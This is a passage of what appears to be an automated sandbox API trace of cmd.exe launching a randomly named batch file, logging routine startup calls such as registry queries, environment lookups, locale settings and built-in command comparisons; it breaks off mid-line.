"Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 631 os_tid = 0x40c [0140.899] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef9b4 | out: lpSystemTimeAsFileTime=0x1ef9b4*(dwLowDateTime=0x140db9c0, dwHighDateTime=0x1d68287)) [0140.899] GetCurrentProcessId () returned 0x24c [0140.899] GetCurrentThreadId () returned 0x40c [0140.899] GetTickCount () returned 0x1152d39 [0140.900] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef9ac | out: lpPerformanceCount=0x1ef9ac*=26123857449) returned 1 [0140.902] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0140.902] __set_app_type (_Type=0x1) [0140.902] __p__fmode () returned 0x770331f4 [0140.902] __p__commode () returned 0x770331fc [0140.902] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0140.902] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0140.903] GetCurrentThreadId () returned 0x40c [0140.903] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x40c) returned 0x60 [0140.903] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0140.903] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0140.903] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.903] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.903] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef944 | out: phkResult=0x1ef944*=0x0) returned 0x2 [0140.904] VirtualQuery (in: lpAddress=0x1ef97b, lpBuffer=0x1ef914, dwLength=0x1c | out: lpBuffer=0x1ef914*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.904] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1ef914, dwLength=0x1c | out: lpBuffer=0x1ef914*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.904] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1ef914, dwLength=0x1c | out: lpBuffer=0x1ef914*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.904] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1ef914, dwLength=0x1c | out: lpBuffer=0x1ef914*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.904] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1ef914, dwLength=0x1c | out: lpBuffer=0x1ef914*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x39000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.904] GetConsoleOutputCP () returned 0x1b5 [0140.905] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0140.905] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0140.905] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.905] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.906] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.906] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0140.906] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.906] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.907] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.907] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0140.908] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.908] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.908] GetEnvironmentStringsW () returned 0x424070* [0140.908] GetProcessHeap () returned 0x410000 [0140.908] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xaca) returned 0x424b48 [0140.909] FreeEnvironmentStringsW (penv=0x424070) returned 1 [0140.909] GetProcessHeap () returned 0x410000 [0140.909] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4) returned 0x420d28 [0140.909] GetEnvironmentStringsW () returned 0x424070* [0140.909] GetProcessHeap () returned 0x410000 [0140.909] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xaca) returned 0x425620 [0140.910] FreeEnvironmentStringsW (penv=0x424070) returned 1 [0140.910] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee8b4 | out: phkResult=0x1ee8b4*=0x68) returned 0x0 [0140.910] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee8bc, lpData=0x1ee8c0, lpcbData=0x1ee8b8*=0x1000 | out: lpType=0x1ee8bc*=0x0, lpData=0x1ee8c0*=0x0, lpcbData=0x1ee8b8*=0x1000) returned 0x2 [0140.910] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee8bc, lpData=0x1ee8c0, lpcbData=0x1ee8b8*=0x1000 | out: lpType=0x1ee8bc*=0x4, lpData=0x1ee8c0*=0x1, lpcbData=0x1ee8b8*=0x4) returned 0x0 [0140.910] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee8bc, lpData=0x1ee8c0, lpcbData=0x1ee8b8*=0x1000 | out: lpType=0x1ee8bc*=0x0, lpData=0x1ee8c0*=0x1, lpcbData=0x1ee8b8*=0x1000) returned 0x2 [0140.910] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee8bc, lpData=0x1ee8c0, lpcbData=0x1ee8b8*=0x1000 | out: lpType=0x1ee8bc*=0x4, lpData=0x1ee8c0*=0x0, lpcbData=0x1ee8b8*=0x4) returned 0x0 [0140.910] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee8bc, lpData=0x1ee8c0, lpcbData=0x1ee8b8*=0x1000 | out: lpType=0x1ee8bc*=0x4, lpData=0x1ee8c0*=0x40, lpcbData=0x1ee8b8*=0x4) returned 0x0 [0140.910] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee8bc, lpData=0x1ee8c0, lpcbData=0x1ee8b8*=0x1000 | out: lpType=0x1ee8bc*=0x4, lpData=0x1ee8c0*=0x40, lpcbData=0x1ee8b8*=0x4) returned 0x0 [0140.911] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee8bc, lpData=0x1ee8c0, lpcbData=0x1ee8b8*=0x1000 | out: lpType=0x1ee8bc*=0x0, lpData=0x1ee8c0*=0x40, lpcbData=0x1ee8b8*=0x1000) returned 0x2 [0140.911] RegCloseKey (hKey=0x68) returned 0x0 [0140.911] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee8b4 | out: phkResult=0x1ee8b4*=0x68) returned 0x0 [0140.911] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee8bc, lpData=0x1ee8c0, lpcbData=0x1ee8b8*=0x1000 | out: lpType=0x1ee8bc*=0x0, lpData=0x1ee8c0*=0x40, lpcbData=0x1ee8b8*=0x1000) returned 0x2 [0140.911] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee8bc, lpData=0x1ee8c0, lpcbData=0x1ee8b8*=0x1000 | out: lpType=0x1ee8bc*=0x4, lpData=0x1ee8c0*=0x1, lpcbData=0x1ee8b8*=0x4) returned 0x0 [0140.911] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee8bc, lpData=0x1ee8c0, lpcbData=0x1ee8b8*=0x1000 | out: lpType=0x1ee8bc*=0x0, lpData=0x1ee8c0*=0x1, lpcbData=0x1ee8b8*=0x1000) returned 0x2 [0140.911] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee8bc, lpData=0x1ee8c0, lpcbData=0x1ee8b8*=0x1000 | out: lpType=0x1ee8bc*=0x4, lpData=0x1ee8c0*=0x0, lpcbData=0x1ee8b8*=0x4) returned 0x0 [0140.911] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee8bc, lpData=0x1ee8c0, lpcbData=0x1ee8b8*=0x1000 | out: lpType=0x1ee8bc*=0x4, lpData=0x1ee8c0*=0x9, lpcbData=0x1ee8b8*=0x4) returned 0x0 [0140.912] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee8bc, lpData=0x1ee8c0, lpcbData=0x1ee8b8*=0x1000 | out: lpType=0x1ee8bc*=0x4, lpData=0x1ee8c0*=0x9, lpcbData=0x1ee8b8*=0x4) returned 0x0 [0140.912] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee8bc, lpData=0x1ee8c0, lpcbData=0x1ee8b8*=0x1000 | out: lpType=0x1ee8bc*=0x0, lpData=0x1ee8c0*=0x9, lpcbData=0x1ee8b8*=0x1000) returned 0x2 [0140.912] RegCloseKey (hKey=0x68) returned 0x0 [0140.912] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2b4 [0140.912] srand (_Seed=0x5f51e2b4) [0140.912] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\"\"" [0140.912] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\"\"" [0140.913] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0140.913] GetProcessHeap () returned 0x410000 [0140.913] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x210) returned 0x424070 [0140.913] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x424078, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0140.914] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.914] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.914] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.914] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.914] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.914] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.914] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.914] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.914] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.914] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.914] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.914] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.914] GetProcessHeap () returned 0x410000 [0140.914] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x424b48 | out: hHeap=0x410000) returned 1 [0140.914] GetEnvironmentStringsW () returned 0x424288* [0140.915] GetProcessHeap () returned 0x410000 [0140.915] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xae2) returned 0x426be8 [0140.915] FreeEnvironmentStringsW (penv=0x424288) returned 1 [0140.915] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.915] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.915] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.915] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.915] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.915] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.915] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.915] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.915] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.915] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.915] GetProcessHeap () returned 0x410000 [0140.915] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x54) returned 0x4276d8 [0140.915] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef680 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0140.915] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef680, lpFilePart=0x1ef67c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1ef67c*="Desktop") returned 0x25 [0140.916] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0140.916] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef3fc | out: lpFindFileData=0x1ef3fc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x423ef0 [0140.916] FindClose (in: hFindFile=0x423ef0 | out: hFindFile=0x423ef0) returned 1 [0140.916] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1ef3fc | out: lpFindFileData=0x1ef3fc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x423ef0 [0140.916] FindClose (in: hFindFile=0x423ef0 | out: hFindFile=0x423ef0) returned 1 [0140.916] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0140.916] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1ef3fc | out: lpFindFileData=0x1ef3fc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x423ef0 [0140.916] FindClose (in: hFindFile=0x423ef0 | out: hFindFile=0x423ef0) returned 1 [0140.917] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0140.917] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0140.917] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0140.917] GetProcessHeap () returned 0x410000 [0140.917] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426be8 | out: hHeap=0x410000) returned 1 [0140.917] GetEnvironmentStringsW () returned 0x4260f8* [0140.917] GetProcessHeap () returned 0x410000 [0140.917] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb36) returned 0x427f38 [0140.917] FreeEnvironmentStringsW (penv=0x4260f8) returned 1 [0140.917] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0140.917] GetProcessHeap () returned 0x410000 [0140.917] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4276d8 | out: hHeap=0x410000) returned 1 [0140.917] GetProcessHeap () returned 0x410000 [0140.917] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x400e) returned 0x428a78 [0140.918] GetProcessHeap () returned 0x410000 [0140.918] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xee) returned 0x424dc8 [0140.918] GetProcessHeap () returned 0x410000 [0140.918] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4008) returned 0x42ca90 [0140.918] GetProcessHeap () returned 0x410000 [0140.918] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4008) returned 0x430aa0 [0140.919] GetProcessHeap () returned 0x410000 [0140.919] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x428a78 | out: hHeap=0x410000) returned 1 [0140.919] GetConsoleOutputCP () returned 0x1b5 [0140.919] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0140.919] GetUserDefaultLCID () returned 0x409 [0140.920] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0140.920] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef7c0, cchData=128 | out: lpLCData="0") returned 2 [0140.920] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef7c0, cchData=128 | out: lpLCData="0") returned 2 [0140.920] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef7c0, cchData=128 | out: lpLCData="1") returned 2 [0140.920] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0140.920] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.920] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.921] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.921] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.921] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.921] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.921] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.921] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0140.921] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0140.921] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.922] GetProcessHeap () returned 0x410000 [0140.922] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20c) returned 0x424ec0 [0140.922] GetConsoleTitleW (in: lpConsoleTitle=0x424ec0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.922] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0140.923] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0140.923] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0140.923] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0140.923] GetProcessHeap () returned 0x410000 [0140.923] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x400a) returned 0x428a78 [0140.924] GetProcessHeap () returned 0x410000 [0140.924] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x428a78 | out: hHeap=0x410000) returned 1 [0140.926] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"", _String2=")") returned -7 [0140.926] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0140.926] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0140.926] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0140.926] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0140.926] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0140.926] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0140.926] GetProcessHeap () returned 0x410000 [0140.926] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x4250d8 [0140.926] GetProcessHeap () returned 0x410000 [0140.926] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x72) returned 0x420ee8 [0140.928] GetProcessHeap () returned 0x410000 [0140.928] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x7e) returned 0x425138 [0141.632] GetConsoleTitleW (in: lpConsoleTitle=0x1ef4b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.632] GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat\"")) returned 0xffffffff [0141.632] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0141.632] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0141.632] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0141.633] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0141.633] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0141.633] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0141.633] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0141.633] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0141.633] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0141.633] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0141.633] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0141.633] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0141.633] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0141.633] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0141.633] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0141.633] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0141.633] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0141.633] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0141.633] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0141.633] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0141.633] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0141.633] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0141.633] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0141.633] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0141.633] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0141.633] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0141.633] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0141.633] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0141.633] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0141.633] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0141.633] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0141.633] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0141.634] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0141.634] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0141.634] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0141.634] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0141.634] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0141.634] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0141.634] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0141.634] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0141.634] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0141.634] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0141.634] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0141.634] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0141.634] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0141.634] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0141.634] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0141.634] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0141.634] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0141.634] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0141.634] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0141.634] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0141.634] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0141.634] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0141.634] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0141.634] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0141.634] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0141.634] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0141.634] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0141.634] _wcsicmp 